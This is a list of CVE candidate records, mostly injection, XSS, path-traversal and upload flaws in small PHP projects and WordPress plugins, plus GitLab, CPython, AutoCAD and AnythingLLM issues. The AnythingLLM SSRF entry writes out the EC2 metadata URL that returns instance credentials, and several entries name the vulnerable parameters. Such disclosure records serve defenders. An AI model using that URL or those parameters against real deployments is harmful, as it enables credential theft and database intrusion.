CVE 2024 475 Candidate A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580. MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf | MISC:https://vuldb.com/?ctiid.250580 | URL:https://vuldb.com/?ctiid.250580 | MISC:https://vuldb.com/?id.250580 | URL:https://vuldb.com/?id.250580 Assigned (20240112)
CVE 2024 474 Candidate A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579. MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf | MISC:https://vuldb.com/?ctiid.250579 | URL:https://vuldb.com/?ctiid.250579 | MISC:https://vuldb.com/?id.250579 | URL:https://vuldb.com/?id.250579 Assigned (20240112)
CVE 2024 473 Candidate A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf | MISC:https://vuldb.com/?ctiid.250578 | URL:https://vuldb.com/?ctiid.250578 | MISC:https://vuldb.com/?id.250578 | URL:https://vuldb.com/?id.250578 Assigned (20240112)
CVE 2024 472 Candidate A vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf | MISC:https://vuldb.com/?ctiid.250577 | URL:https://vuldb.com/?ctiid.250577 | MISC:https://vuldb.com/?id.250577 | URL:https://vuldb.com/?id.250577 Assigned (20240112)
CVE 2024 471 Candidate A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576. MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf | MISC:https://vuldb.com/?ctiid.250576 | URL:https://vuldb.com/?ctiid.250576 | MISC:https://vuldb.com/?id.250576 | URL:https://vuldb.com/?id.250576 Assigned (20240112)
CVE 2024 470 Candidate A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575. MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf | MISC:https://vuldb.com/?ctiid.250575 | URL:https://vuldb.com/?ctiid.250575 | MISC:https://vuldb.com/?id.250575 | URL:https://vuldb.com/?id.250575 Assigned (20240112)
CVE 2024 469 Candidate A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf | MISC:https://vuldb.com/?ctiid.250574 | URL:https://vuldb.com/?ctiid.250574 | MISC:https://vuldb.com/?id.250574 | URL:https://vuldb.com/?id.250574 Assigned (20240112)
CVE 2024 468 Candidate A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability. MISC:https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf | URL:https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf | MISC:https://vuldb.com/?ctiid.250573 | URL:https://vuldb.com/?ctiid.250573 | MISC:https://vuldb.com/?id.250573 | URL:https://vuldb.com/?id.250573 Assigned (20240112)
CVE 2024 467 Candidate A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572. MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf | URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf | MISC:https://vuldb.com/?ctiid.250572 | URL:https://vuldb.com/?ctiid.250572 | MISC:https://vuldb.com/?id.250572 | URL:https://vuldb.com/?id.250572 Assigned (20240112)
CVE 2024 466 Candidate A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571. MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf | URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf | MISC:https://vuldb.com/?ctiid.250571 | URL:https://vuldb.com/?ctiid.250571 | MISC:https://vuldb.com/?id.250571 | URL:https://vuldb.com/?id.250571 Assigned (20240112)
CVE 2024 465 Candidate A vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability. MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf | URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf | MISC:https://vuldb.com/?ctiid.250570 | URL:https://vuldb.com/?ctiid.250570 | MISC:https://vuldb.com/?id.250570 | URL:https://vuldb.com/?id.250570 Assigned (20240112)
CVE 2024 464 Candidate A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability. MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf | URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf | MISC:https://vuldb.com/?ctiid.250569 | URL:https://vuldb.com/?ctiid.250569 | MISC:https://vuldb.com/?id.250569 | URL:https://vuldb.com/?id.250569 Assigned (20240112)
CVE 2024 463 Candidate A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568. MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf | URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf | MISC:https://vuldb.com/?ctiid.250568 | URL:https://vuldb.com/?ctiid.250568 | MISC:https://vuldb.com/?id.250568 | URL:https://vuldb.com/?id.250568 Assigned (20240112)
CVE 2024 462 Candidate A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567. MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf | URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf | MISC:https://vuldb.com/?ctiid.250567 | URL:https://vuldb.com/?ctiid.250567 | MISC:https://vuldb.com/?id.250567 | URL:https://vuldb.com/?id.250567 Assigned (20240112)
CVE 2024 461 Candidate A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability. MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf | URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf | MISC:https://vuldb.com/?ctiid.250566 | URL:https://vuldb.com/?ctiid.250566 | MISC:https://vuldb.com/?id.250566 | URL:https://vuldb.com/?id.250566 Assigned (20240112)
CVE 2024 460 Candidate A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability. MISC:https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf | URL:https://github.com/BxYQ/vul/blob/main/2Faculty%20Management%20System-SQL.pdf | MISC:https://vuldb.com/?ctiid.250565 | URL:https://vuldb.com/?ctiid.250565 | MISC:https://vuldb.com/?id.250565 | URL:https://vuldb.com/?id.250565 Assigned (20240112)
CVE 2024 459 Candidate A vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564. MISC:https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing | URL:https://drive.google.com/file/d/1nSgSw1cTXZWeYTjt4rliMIDHyQcGK-8z/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250564 | URL:https://vuldb.com/?ctiid.250564 | MISC:https://vuldb.com/?id.250564 | URL:https://vuldb.com/?id.250564 Assigned (20240112)
CVE 2024 456 Candidate An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project MISC:GitLab Issue #430726 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/430726 | MISC:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/ | URL:https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/ Assigned (20240112)
CVE 2024 455 Candidate The inclusion of the web scraper for AnythingLLM means that any user with the proper authorization level (manager, admin, and when in single user) could put in the URL ``` http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance ``` which is a special IP and URL that resolves only when the request comes from within an EC2 instance. This would allow the user to see the connection/secret credentials for their specific instance and be able to manage it regardless of who deployed it. The user would have to have pre-existing knowledge of the hosting infra which the target instance is deployed on, but if sent - would resolve if on EC2 and the proper `iptable` or firewall rule is not configured for their setup. MISC:https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55 | URL:https://github.com/mintplex-labs/anything-llm/commit/b2b2c2afe15c48952d57b4d01e7108f9515c5f55 | MISC:https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c | URL:https://huntr.com/bounties/07d83b49-7ebb-40d2-83fc-78381e3c5c9c Assigned (20240112)
CVE 2024 454 Candidate ELAN Match-on-Chip FPR solution has design fault about potential risk of valid SID leakage and enumeration with spoof sensor. This fault leads to that Windows Hello recognition would be bypass with cloning SID to cause broken account identity. Version which is lower than 3.0.12011.08009(Legacy)/3.3.12011.08103(ESS) would suffer this risk on DELL Inspiron platform. MISC:https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy | URL:https://www.emc.com.tw/emc/tw/vulnerability-disclosure-policy Assigned (20240112)
CVE 2024 450 Candidate An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive. MISC:https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85 | URL:https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85 | MISC:https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba | URL:https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba | MISC:https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51 | URL:https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51 | MISC:https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549 | URL:https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549 | MISC:https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183 | URL:https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183 | MISC:https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b | URL:https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b | MISC:https://github.com/python/cpython/issues/109858 | URL:https://github.com/python/cpython/issues/109858 | MISC:https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/ | URL:https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/ | MISC:https://www.bamsoftware.com/hacks/zipbomb/ | URL:https://www.bamsoftware.com/hacks/zipbomb/ | MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3771-1] python2.7 security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00024.html | MLIST:[debian-lts-announce] 20240324 [SECURITY] [DLA 3772-1] python3.7 security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00025.html Assigned (20240111)
CVE 2024 449 Candidate The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52 | URL:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L52 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve Assigned (20240111)
CVE 2024 448 Candidate The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20 | URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20 | MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17 | URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve Assigned (20240111)
CVE 2024 447 Candidate The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin settings. MISC:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60 | URL:https://plugins.trac.wordpress.org/browser/artibot/trunk/artibot.php#L60 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/848f36de-c62a-45ee-b259-46dab73e4439?source=cve Assigned (20240111)
CVE 2024 446 Candidate A maliciously crafted STP, CATPART or MODEL file in ASMKERN228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 443 Candidate A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error. MISC:RHBZ#2257968 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257968 | MISC:RHSA-2023:7077 | URL:https://access.redhat.com/errata/RHSA-2023:7077 | MISC:https://access.redhat.com/security/cve/CVE-2024-0443 | URL:https://access.redhat.com/security/cve/CVE-2024-0443 | MISC:https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/ | URL:https://lore.kernel.org/linux-block/20221215033132.230023-3-longman@redhat.com/ Assigned (20240111)
CVE 2024 442 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via element URL parameters in all versions up to, and including, 1.3.87 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php | URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/advanced-slider/widgets/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php | MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php | URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/dual-button/widgets/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php | MISC:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php | URL:https://plugins.trac.wordpress.org/changeset/3032004/royal-elementor-addons/tags/1.3.88/modules/pricing-table/widgets/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/royal-elementor-addons/tags/1.3.87&new_path=/royal-elementor-addons/tags/1.3.88&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/256b4818-290b-4660-8e83-c18b068a8959?source=cve Assigned (20240111)
CVE 2024 440 Candidate Attacker, with permission to submit a link or submits a link via POST to be collected that is using the file:// protocol can then introspect host files and other relatively stored files. MISC:https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3 | URL:https://github.com/mintplex-labs/anything-llm/commit/1563a1b20f72846d617a88510970d0426ab880d3 | MISC:https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f | URL:https://huntr.com/bounties/263fd7eb-f9a9-4578-9655-0e28c609272f Assigned (20240111)
CVE 2024 439 Candidate As a manager, you should not be able to modify a series of settings. In the UI this is indeed hidden as a convenience for the role since most managers would not be savvy enough to modify these settings. They can use their token to still modify those settings though through a standard HTTP request While this is not a critical vulnerability, it does indeed need to be patched to enforce the expected permission level. MISC:https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688 | URL:https://github.com/mintplex-labs/anything-llm/commit/7200a06ef07d92eef5f3c4c8be29824aa001d688 | MISC:https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce | URL:https://huntr.com/bounties/7fc1b78e-7faf-4f40-961d-61e53dac81ce Assigned (20240111)
CVE 2024 438 Candidate The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991 | URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/assets/js/happy-addons.js#L991 | MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50 | URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/extensions/wrapper-link.php#L50 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve Assigned (20240111)
CVE 2024 436 Candidate Theoretically, it would be possible for an attacker to brute-force the password for an instance in single-user password protection mode via a timing attack given the linear nature of the `!==` used for comparison. The risk is minified by the additional overhead of the request, which varies in a non-constant nature making the attack less reliable to execute MISC:https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0 | URL:https://github.com/mintplex-labs/anything-llm/commit/3c859ba3038121b67fb98e87dc52617fa27cbef0 | MISC:https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268 | URL:https://huntr.com/bounties/3e73cb96-c038-46a1-81b7-4d2215b36268 Assigned (20240111)
CVE 2024 435 Candidate User can send a chat that contains an XSS opportunity that will then run when the chat is sent and on subsequent page loads. Given the minimum requirement for a user to send a chat is to be given access to a workspace via an admin the risk is low. Additionally, the location in which the XSS renders is only limited to the user who submits the XSS. Ultimately, this attack is limited to the user attacking themselves. There is no anonymous chat submission unless the user does not take the minimum steps required to protect their instance. MISC:https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834 | URL:https://github.com/mintplex-labs/anything-llm/commit/a4ace56a401ffc8ce0082d7444159dfd5dc28834 | MISC:https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61 | URL:https://huntr.com/bounties/53308220-8b2e-492f-b248-0985b7c2db61 Assigned (20240111)
CVE 2024 433 Candidate The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_unset_default_card' function. This makes it possible for unauthenticated attackers to remove the default status of a card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://wordpress.org/plugins/wppdf/ | URL:https://wordpress.org/plugins/wppdf/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve Assigned (20240111)
CVE 2024 432 Candidate The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_delete_card' function. This makes it possible for unauthenticated attackers to delete the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://wordpress.org/plugins/wppdf/ | URL:https://wordpress.org/plugins/wppdf/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve Assigned (20240111)
